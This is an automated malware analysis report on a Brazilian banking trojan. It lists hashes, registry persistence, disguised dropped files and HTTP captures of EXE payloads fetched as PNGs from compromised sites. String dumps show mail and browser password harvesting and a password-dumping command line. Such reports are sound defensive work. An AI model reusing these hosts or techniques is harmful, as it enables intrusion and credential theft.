Gen.Variant.Barys.547_d340d14427

by malwarelabrobot on December 12th, 2014 in Malware Descriptions.

HEUR:Trojan-Downloader.Win32.Generic (Kaspersky), Gen:Variant.Barys.547 (B) (Emsisoft), Gen:Variant.Barys.547 (AdAware), Trojan-Banker.Win32.Brasil.FD, Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Downloader, Banker, Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

MD5: d340d14427a8b2fc99ac434826471633
SHA1: b2f409befabf46c35df59c821963f68d83ddb615
SHA256: b89cc8136a1d98d1feda39c61ab3058f63f240a84586dbd6509944812eba2a4b
SSDeep: 24576:dmV0PI0ZwjRpha/Ll6FfRjiQsWv85VJsgty:dlI0Zu7ILIjiQsFfeQy
Size: 1048064 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6, ACProtect141
Company: infidus vilitas facio
Created at: 1992-06-20 01:22:17
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan-Downloader: a Trojan program that downloads files from the Internet without the user's knowledge and executes them.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

net1.exe:2028
net.exe:420
mscorsvw.exe:1912
%original file name%.exe:472

The Trojan injects its code into the following process(es):

AvastK.exe:1520
AvastV.exe:1252

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process AvastK.exe:1520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\EMBUTIR1.exe (105 bytes)

The process %original file name%.exe:472 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\AvastK.exe (16954 bytes)
%Documents and Settings%\%current user%\Application Data\AvastV.exe (54343 bytes)

The process AvastV.exe:1252 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\mip.dat (38 bytes)
%Documents and Settings%\%current user%\Application Data\idpc.d (9 bytes)
%Documents and Settings%\%current user%\Application Data\icone.cur (326 bytes)

Registry activity

The process net1.exe:2028 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "48 BC EE 26 A3 3A C1 33 AD CF 81 20 AF 9F 5B 12"

The process AvastK.exe:1520 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A D9 60 A0 06 20 8A E8 91 CC E4 B7 6A B5 E0 BC"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

The process net.exe:420 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4A 0E 9B CF FB 4B 6D 0E 2C 1B 8D E2 2A 0F C4 E6"

The process mscorsvw.exe:1912 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\.NETFramework\v2.0.50727\NGenService\State]
"AccumulatedWaitIdleTime" = "2340000"

The process %original file name%.exe:472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BD 46 B9 A6 3B EE 77 34 C0 7B C5 49 24 FC 23 40"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Application Data]
"AvastV.exe" = "AvastV"
"AvastK.exe" = "AvastK"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE security zone settings to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security zone settings to map all local web nodes with no dots, which do not refer to any zone, to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings to map all web nodes that bypass the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The process AvastV.exe:1252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "68 8C F8 C8 0B 93 F6 4E 76 CB DE 84 8F 8E 60 1D"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoChangeStartMenu" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"noclose" = "0"
"NoLogOff" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr" = "0"

To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"DesktopU" = "%Documents and Settings%\%current user%\Application Data\AvastV.exe"

Dropped PE files

MD5 File path
4d4435ccf1ebc2763aaa0da2fb693af7 c:\Documents and Settings\"%CurrentUserName%"\Application Data\AvastK.exe
00bda0312fb0cc6a27ff977d6f5e5b29 c:\Documents and Settings\"%CurrentUserName%"\Application Data\AvastV.exe
436c8bca82066f05f6152161bb4450ab c:\Documents and Settings\"%CurrentUserName%"\Application Data\EMBUTIR1.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

VersionInfo

No information is available.

PE Sections

Name    Virtual Address  Virtual Size  Raw Size  Entropy   Section MD5
CODE    4096             934912        934912    4.48199   6b7b952038ce3993f0e37f0336abbcb2
DATA    942080           8164          8192      3.12131   6f05714e4fd75635a3cbecb646fc0d59
BSS     950272           4549          0         0         d41d8cd98f00b204e9800998ecf8427e
.idata  958464           10824         11264     3.4188    b561ce93d5f0ad04493a26e69b4ba223
.tls    970752           16            0         0         d41d8cd98f00b204e9800998ecf8427e
.rdata  974848           24            512       0.139033  0326ef98f785f08357d324c6fabf81c1
.reloc  978944           57492         57856     4.61083   4908082c562d09e805b3be4046370b1b
.rsrc   1040384          34304         34304     3.02535   b417de969b404560d03aa0410159a811

URLs

URL IP
hxxp://sodesasystem.com/guayos/modules/mod_jcomments/images/ht/_x_.png
hxxp://sodesasystem.com/guayos/modules/mod_jcomments/images/ht/w_x_.png
hxxp://igrejaeterna.com.br/media/editors/codemirror/css/codemirror.txt
hxxp://thanhhaievent.com/modules/mod_articles_archive/tmpl/html/o/o.php 112.78.2.207
hxxp://www.igrejaeterna.com.br/media/editors/codemirror/css/codemirror.txt 199.201.88.34
hxxp://www.sodesasystem.com/guayos/modules/mod_jcomments/images/ht/_x_.png 69.73.159.23
hxxp://www.sodesasystem.com/guayos/modules/mod_jcomments/images/ht/w_x_.png 69.73.159.23


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected

Traffic

GET /guayos/modules/mod_jcomments/images/ht/_x_.png HTTP/1.1
Content-Type: text/html
Host: VVV.sodesasystem.com
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36


HTTP/1.1 200 OK
Date: Thu, 11 Dec 2014 13:38:41 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
ETag: "393600-5469eebf-1b3fa9566fd6953c"
Last-Modified: Mon, 17 Nov 2014 12:49:03 GMT
Content-Type: image/png
Content-Length: 3749376
Vary: User-Agent
Cache-Control: public, max-age=604800
Expires: Thu, 18 Dec 2014 13:38:41 GMT
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................

<<< skipped >>>

GET /media/editors/codemirror/css/codemirror.txt HTTP/1.1
Content-Type: text/html
Host: VVV.igrejaeterna.com.br
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; it;rv:1.8.1.12)


HTTP/1.1 200 OK
Date: Thu, 11 Dec 2014 13:38:48 GMT
Server: Apache
Last-Modified: Sat, 04 Oct 2014 20:12:05 GMT
ETag: "2605805-26-5049e76a36139"
Accept-Ranges: bytes
Content-Length: 38
Connection: close
Content-Type: text/plain
4D88B41DB11FC174D87A9E32D370D5369D3092..


GET /guayos/modules/mod_jcomments/images/ht/w_x_.png HTTP/1.1
Content-Type: text/html
Host: VVV.sodesasystem.com
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.111 Safari/537.36


HTTP/1.1 200 OK
Date: Thu, 11 Dec 2014 13:38:44 GMT
Server: LiteSpeed
Accept-Ranges: bytes
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
ETag: "13e400-546b3858-f33bee62cde292a0"
Last-Modified: Tue, 18 Nov 2014 12:15:20 GMT
Content-Type: image/png
Content-Length: 1303552
Vary: User-Agent
Cache-Control: public, max-age=604800
Expires: Thu, 18 Dec 2014 13:38:44 GMT
MZP.....................@.............................................
..!..L.!..This program must be run under Win32..$7....................

<<< skipped >>>

GET /modules/mod_articles_archive/tmpl/html/o/o.php HTTP/1.1
Content-Type: text/html
Host: thanhhaievent.com
Accept: text/html, */*
User-Agent: Mozilla/3.0 (compatible; Indy Library)


HTTP/1.1 403 Forbidden
Server: nginx admin
Date: Thu, 11 Dec 2014 13:38:46 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 1
Connection: keep-alive
...


The Trojan connects to the servers at the following location(s):

AvastV.exe_1252:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
comctl32.dll
USER32.DLL
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
OnKeyDown
OnKeyPress
OnKeyUp$
PasswordChar
OnKeyUp
ssHorizontal
OnKeyUpd'D
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
OnExecute
OnExecute
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
tagMSG
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
TDXTCPClient
1.2.3
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %d %s %d %s %s
password
Password
IdHTTPHeaderInfo
ProxyPasswordT
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
ftpTransfer
ftpReady
ftpAborted
ClientPortMinT
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
saUsernamePassword
PasswordT
0.0.0.1
TIdTCPConnection
IdTCPConnection
EIdTCPConnectionError
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFiletz@
CertFiletz@
KeyFile
OnGetPassword
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertErrorP
EIdOSSLLoadingKeyError
TIdTCPClient
IdTCPClient
BoundPort
PortU
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponseT
TIdHTTPRequest
TIdHTTPProtocol
TIdCustomHTTP
TIdCustomHTTP
TIdHTTP
TIdHTTPP
HTTPOptions
Port(
EIdHTTPProtocolException
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
OnActionExecute
Portable Network Graphics
UXTHEME.DLL
c:\program files\borland\delphi7\Lib\ASXPVS.pas
TSQLTimeStampVariantType
TSQLTimeStampData
SqlTimSt
ole32.dll
SQLTimeStamp
Password
TLoginDialog
TPasswordDialog
c:\program files\borland\delphi7\Lib\ACXPVS.pas
c:\program files\borland\delphi7\Lib\CEXPVS.pas
iexplore.exe
COMCTL32.DLL
TaskDialogIndirect
c:\program files\borland\delphi7\Lib\AOBXPVS.pas
URLColor
OnKeyPress
TMonochromeLookup
Uh.LO
edt_bcd4KeyPress
edt_bcd1KeyPress
edt_bcd2KeyPress
edt_bcd3KeyPress
edt_casKeyPress
edt_dchKeyPress
edt_tkdKeyPress
edt_seeKeyPress
edt_isefKeyPress
edt_eleKeyPress
edt_eluKeyPress
edt_elpKeyPress
edt_elfKeyPress
edt_itbfKeyPress
edt_dtiKeyPress
edt_sepKeyPress
edt_itbf2KeyPress
edt_seuKeyPress
edt_tkfKeyPress
edt_tkeKeyPress
edt_tkpKeyPress
edt_tkuKeyPress
SKINDATA.SK2
edt_stkKeyPress
edt_siasKeyPress
Software\Microsoft\Windows\DWM
ic.cur
icone.cur
chrome
opera
"!@#**%&* ()_ |<>:****?
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegCreateKeyExA
WinExec
GetWindowsDirectoryA
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
GetViewportOrgEx
keybd_event
VkKeyScanA
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
GetAsyncKeyState
EnumWindows
EnumThreadWindows
EnumChildWindows
ActivateKeyboardLayout
olepro32.dll
shell32.dll
ShellExecuteExA
ShellExecuteA
wsock32.dll
gdiplus.dll
GdipSetImageAttributesColorKeys
GdipSetStringFormatHotkeyPrefix
GdiplusShutdown
winmm.dll
KWindows
UrlMon
rSqlTimSt
0IdHTTPHeaderInfo
 IdTCPServer
IdTCPStream
.MaskEdEx
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
Picture.Data
Appearance.BackGroundColor
Appearance.BorderColor
Appearance.ActiveSegmentColor
Appearance.InActiveSegmentColor
clSilver!Appearance.TransitionSegmentColor
Appearance.ProgressSegmentColor
LoginDialog
Database Login
&Password:
PasswordDialog
Enter password
1.7.1.4
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
MSGDLG
TMSGRPC
TMSGRPCD
TMSGRPCH
TMSGRPG
TMSGRPGD
TMSGRPGH
TMSGRPU
TMSGRPUD
TMSGRPUH
TSUIPASSWORDDIALOG
TSUIURLLABEL
TLOGINDIALOG
TPASSWORDDIALOG
Unsupported PixelFormat
Invalid stream operation
Invalid extension introducerúiled to allocate memory for GIF DIB
Invalid Image trailerAInternal error: Extension Instance does not match Extension Label,Unsupported Application Extension block size
Unknown GIF block type'Object type not supported for operation
Remote Login
Unsupported GIF version
cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.oSome operation could not be performed because the system is out of resources. Close some windows and try again.OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.
%s is not a valid BCD value$Could not parse SQL TimeStamp string
Invalid SQL date/time values
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
SSL status: "%s"
Host field is emptyjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corruptedUThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.
Description: BThe "Portable Network Graphics" image contains an invalid palette.
The file being readed is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corruped, try obtaining it again.nThis "Portable Network Graphics" image is not supported or it might be invalid.
This "Portable Network Graphics" image is not supported because either it's width or height exceeds the maximum size, which is 65535 pixels length.
There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
Protocol family not supported.0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Max line length exceeded.*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Window Text=This control requires version 4.70 or greater of COMCTL32.DLL
Date exceeds maximum of %s
Date is less than minimum of %s4You must be in ShowCheckbox mode to set to this date#Failed to set calendar date or timeúiled to set maximum selection range$Failed to set calendar min/max rangeúiled to set calendar selected range
No help keyword specified.&Cannot change the size of a JPEG image
JPEG error #%d
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Value must be between %d and %d
Invalid clipboard format Clipboard does not support Icons
Text exceeds memo capacity/Menu '%s' is already being used by another form
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
%s property out of range
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Unsupported clipboard format
Invalid stream format$''%s'' is not a valid component name
Invalid property element: %s
Invalid property type: %s
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Failed to get data for '%s'
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
No argument for format '%s'"Variant method calls not supported
Invalid variant operation%Invalid variant operation (%s%.8x)
%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
!'%s' is not a valid integer value('%s' is not a valid floating point value!'%s' is not a valid date and time
'%s' is not a valid GUID value
I/O error %d
2.3.4.5
1.0.0.1

AvastK.exe_1520:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
Proportional
MAPI32.DLL
PasswordChar(
OnKeyDown
OnKeyPressD
OnKeyUph
ssHorizontal
OnKeyUpH
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword<(A
crSQLWait
%s (%s)
imm32.dll
AutoHotkeysH
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview<
WindowStatet
tagMSG
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
OnExecuteMacro
Service %s
Topic %s
OnActionExecutel
getservbyport
WSAAsyncGetServByPort
WSAJoinLeaf
WS2_32.DLL
127.0.0.1
TIdSocketListWindows
TIdStackWindowsU
IdStackWindows
%s, %d %s %d %s %s
ftpTransfer
ftpReady
ftpAborted
ClientPortMinT
ClientPortMax
Port
EIdCanNotBindPortInRange
EIdInvalidPortRangeSVW
saUsernamePassword
PasswordT
Port
0.0.0.1
TIdTCPConnection
TIdTCPConnection`
IdTCPConnection
EIdTCPConnectionError
TIdTCPClient
TIdTCPClient0
IdTCPClient
BoundPort
PortU
password
Password
IdHTTPHeaderInfo
ProxyPasswordT
ProxyPort
Mozilla/3.0 (compatible; Indy Library)
libeay32.dll
ssleay32.dll
SSL_CTX_use_PrivateKey_file
SSL_CTX_use_certificate_file
SSL_get_peer_certificate
SSL_CTX_set_default_passwd_cb
SSL_CTX_set_default_passwd_cb_userdata
SSL_CTX_check_private_key
X509_STORE_CTX_get_current_cert
des_set_key
sslvrfFailIfNoPeerCert
TPasswordEvent
Certificate
RootCertFile
CertFile
KeyFile
OnGetPasswordh'G
EIdOSSLLoadingRootCertError
EIdOSSLLoadingCertError
EIdOSSLLoadingKeyError
CommentURL
TIdHTTPMethod
IdHTTP
TIdHTTPOption
TIdHTTPOptions
TIdHTTPProtocolVersion
TIdHTTPOnRedirectEvent
TIdHTTPResponse
TIdHTTPResponsetqG
TIdHTTPRequest
TIdHTTPRequest,rG
TIdHTTPProtocol@sG
TIdCustomHTTP
TIdCustomHTTP@sG
TIdHTTP(uG
TIdHTTPptG
HTTPOptions
PortHeG
EIdHTTPProtocolException
application/x-www-form-urlencoded
HTTPS
https
This request method is supported in HTTP 1.1
HTTP/1.0 200 OK
HTTP/
[email protected]
*.dbx
C:\Windows\winx.log
*.wab
*.mbx
*.mai
*.eml
*.tbb
*.mbox
1.2.3
Portable Network Graphics
c:\program files\borland\delphi7\Lib\AdvEdDD.pas
etPassword
TURLClickEvent
ShowURL
URLColor
PasswordChar
OnURLClick
COMCTL32.DLL
\EMBUTIR1.exe
cmd.exe /c "
EMBUTIR1.exe /stext
\senha.txt"
\winhelp32.txt
\h4714log.txt
\senha.txt
\autostart.bat
deflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly
inflate 1.2.3 Copyright 1995-2005 Mark Adler
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
ole32.dll
shell32.dll
ShellExecuteA
.text
`.rdata
@.data
.rsrc
t{SSh
v%SSW
Mail PassView
Mozilla\Profiles
Software\Mozilla\Mozilla Thunderbird
%s\Main
sqlite3.dll
nss3.dll
%programfiles%\Mozilla Thunderbird
AddExportHeaderLine
%s %s %s
HTTPMail User Name
SMTP USer Name
HTTPMail Server
SMTP Server
POP3 Password2
IMAP Password2
HTTPMail Password2
SMTP Password2
POP3 Port
IMAP Port
HTTPMail Port
SMTP Port
HTTPMail Secure Connection
SMTP Secure Connection
SMTP Display Name
SMTP Email Address
POP3 Password
IMAP Password
HTTP Password
SMTP Password
HTTP User
SMTP User
HTTP Server URL
HTTP Port
HTTPMail Use SSL
SMTP Use SSL
%s\%s
PopPort
PopPassword
SMTPAccount
SMTPServer
SMTPPort
SMTPLogSecure
SMTPPassword
%s\Accounts
LoginName
SavePasswordText
ESMTPUsername
ESMTPPassword
POP3Password
fb.dat
%[email protected]
%[email protected]
"Account","Login Name","Password","Web Site","Comments"
Software\Microsoft\Windows Messaging Subsystem\Profiles
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
<meta http-equiv='content-type' content='text/html;charset=%s'>
<br><h4>%s <a href="hXXp://VVV.nirsoft.net/" target="newwin">%s</a></h4><p>
smtp
*.ini
netmsg.dll
Error %d: %s
menu_%d
dialog_%d
TranslatorURL
_lng.ini
%-18s: %s
%%-%d.%ds
<td bgcolor=#%s nowrap>%s
<td bgcolor=#%s>%s
<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
bgcolor="%s"
<font color="%s">%s</font>
<%s>%s</%s>
</%s>
report.html
*.txt
*.htm;*.html
*.xml
*.csv
Software\NirSoft\MailPassView
MailPassView
/skeepass
/deleteregkey
Failed to load the executable file !
mail.account.account
mail.server
port
mail.identity
signon.signonfilename
mailbox://%s@%s
imap://%s@%s
SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_logins
mailbox://%s
imap://%s
smtp://%s
signons.txt
signons.sqlite
prefs.js
Password.NET Messenger Service
User.NET Messenger Service
Passport.Net\*
ps:password
windowslive:name=
Exception %8.8X at address %8.8X in module %s
Stack Data: %s
Code Data: %s
mozsqlite3.dll
PK11_GetInternalKeySlot
PK11_CheckUserPassword
psapi.dll
pstorec.dll
5e7e8100-9138-11d1-945a-00c04fc308ff
00000000-0000-0000-0000-000000000000
220D5CD0-853A-11D0-84BC-00C04FD43F8F
220D5CD1-853A-11D0-84BC-00C04FD43F8F
220D5CC1-853A-11D0-84BC-00C04FD43F8F
417E2D75-84BD-11D0-84BB-00C04FD43F8F
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
shlwapi.dll
<html><head>%s<title>%s</title></head>
%s <h3>%s</h3>
size="%d"
color="#%s"
<font color="%s">
<table border="1" cellpadding="5"><tr%s>
width="%s"
<th%s>%s%s%s
SOFTWARE\Mozilla
mozilla
%s\bin
PathToExe
\sqlite3.dll
\mozsqlite3.dll
sqlite3_open
sqlite3_prepare
sqlite3_step
sqlite3_column_text
sqlite3_column_int
sqlite3_column_int64
sqlite3_finalize
sqlite3_close
sqlite3_exec
Software\Microsoft\Windows Mail
Software\Microsoft\Windows Live Mail
SMTP_Server
SMTP_User_Name
POP3_Password2
IMAP_Password2
NNTP_Password2
SMTP_Password2
SMTP_Email_Address
SMTP_Port
NNTP_Port
IMAP_Port
POP3_Port
SMTP_Secure_Connection
*.oeaccount
\Microsoft\Windows Mail
\Microsoft\Windows Live Mail
f:\Projects\VS2005\mailpv\Release\mailpv.pdb
msvcrt.dll
_acmdln
COMCTL32.dll
RPCRT4.dll
GetWindowsDirectoryA
KERNEL32.dll
EnumChildWindows
USER32.dll
GDI32.dll
comdlg32.dll
RegDeleteKeyA
RegEnumKeyA
RegEnumKeyExA
ADVAPI32.dll
SHELL32.dll
